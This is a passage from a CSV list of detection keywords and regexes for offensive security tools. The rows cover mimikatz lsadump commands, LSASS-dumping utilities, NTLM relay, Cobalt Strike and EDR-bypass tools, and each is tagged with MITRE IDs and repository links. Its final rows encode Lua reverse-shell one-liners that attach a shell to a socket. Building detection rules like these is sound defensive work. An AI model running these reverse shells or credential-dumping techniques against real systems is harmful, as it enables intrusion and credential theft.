perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::netsync*",".{0,1000}lsadump\:\:netsync.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::packages*",".{0,1000}lsadump\:\:packages.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::postzerologon*",".{0,1000}lsadump\:\:postzerologon.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::RpData*",".{0,1000}lsadump\:\:RpData.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::sam*",".{0,1000}lsadump\:\:sam.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::secrets*",".{0,1000}lsadump\:\:secrets.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::setntlm*",".{0,1000}lsadump\:\:setntlm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::trust*",".{0,1000}lsadump\:\:trust.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::zerologon*",".{0,1000}lsadump\:\:zerologon.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsarelayx Starting....*",".{0,1000}lsarelayx\sStarting\.\.\.\..{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*lsarelayx.exe*",".{0,1000}lsarelayx\.exe.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the 
host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*lsarelayx_0.1_ALPHA.zip*",".{0,1000}lsarelayx_0\.1_ALPHA\.zip.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*lsarpc_##*",".{0,1000}lsarpc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*LSASecretDefaultPassword*",".{0,1000}LSASecretDefaultPassword.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*lsasecrets.py*",".{0,1000}lsasecrets\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*lsass comsvcs*",".{0,1000}lsass\scomsvcs.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*lsass direct*",".{0,1000}lsass\sdirect.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Lsass Dump File Created*",".{0,1000}Lsass\sDump\sFile\sCreated.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*lsass dump from agent*",".{0,1000}lsass\sdump\sfrom\sagent.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*LSASS dump might fail if RunAsPPL is enabled*",".{0,1000}LSASS\sdump\smight\sfail\sif\sRunAsPPL\sis\senabled.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*lsass.dmp*",".{0,1000}lsass\.dmp.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*lsass.dmp*",".{0,1000}lsass\.dmp.{0,1000}","offensive_tool_keyword","lsass","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","N/A","N/A","N/A","Credential 
Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*lsass.dmp*",".{0,1000}lsass\.dmp.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*lsass.exe*.dmp*",".{0,1000}lsass\.exe.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","0","N/A","N/A","9","810","141","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*lsass.exe*C:\temp\tmp.tmp*",".{0,1000}lsass\.exe.{0,1000}C\:\\temp\\tmp\.tmp.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*lsass_*.dmp*",".{0,1000}lsass_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" 
"*lsass_dump_*",".{0,1000}lsass_dump_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*lsass_dump_lsassy_*",".{0,1000}lsass_dump_lsassy_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*lsassdump.dmp*",".{0,1000}lsassdump\.dmp.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*LsassDump_20*.ps1*",".{0,1000}LsassDump_20.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework. A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","993","161","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" "*lsassDumpRetryCount*",".{0,1000}lsassDumpRetryCount.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential 
Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*lsassdumps*",".{0,1000}lsassdumps.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*LSASSProtectionBypass*/",".{0,1000}LSASSProtectionBypass.{0,1000}\/","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*LsassSilentProcessExit.cpp*",".{0,1000}LsassSilentProcessExit\.cpp.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*LsassSilentProcessExit.exe*",".{0,1000}LsassSilentProcessExit\.exe.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*LsassSilentProcessExit.vcxproj*",".{0,1000}LsassSilentProcessExit\.vcxproj.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via 
SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*LsassSilentProcessExit-master*",".{0,1000}LsassSilentProcessExit\-master.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*lsassy *",".{0,1000}lsassy\s.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*lsassy -*",".{0,1000}lsassy\s\-.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*lsassy -v -*",".{0,1000}lsassy\s\-v\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*lsassy.*",".{0,1000}lsassy\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*lsassy/dumpmethod*",".{0,1000}lsassy\/dumpmethod.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*lsassy_dump*",".{0,1000}lsassy_dump.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*lsassy_dump*",".{0,1000}lsassy_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*lsassy_dump.py*",".{0,1000}lsassy_dump\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*lsassy-linux-x64-*",".{0,1000}lsassy\-linux\-x64\-.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*lsassy-MacOS-x64-*",".{0,1000}lsassy\-MacOS\-x64\-.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*lsassy-windows-x64-*.exe",".{0,1000}lsassy\-windows\-x64\-.{0,1000}\.exe","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*lse.sh -l*",".{0,1000}lse\.sh\s\-l.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*lsecqt/OffensiveCpp*",".{0,1000}lsecqt\/OffensiveCpp.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*lu4p/ToRat*",".{0,1000}lu4p\/ToRat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administration tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*lua -e*require('socket');*t:connect*os.execute('""/bin/bash"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""\/bin\/bash\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua -e*require('socket');*t:connect*os.execute('""/bin/sh"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""\/bin\/sh\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua -e*require('socket');*t:connect*os.execute('""bash"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""bash\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua -e*require('socket');*t:connect*os.execute('""cmd"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""cmd\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 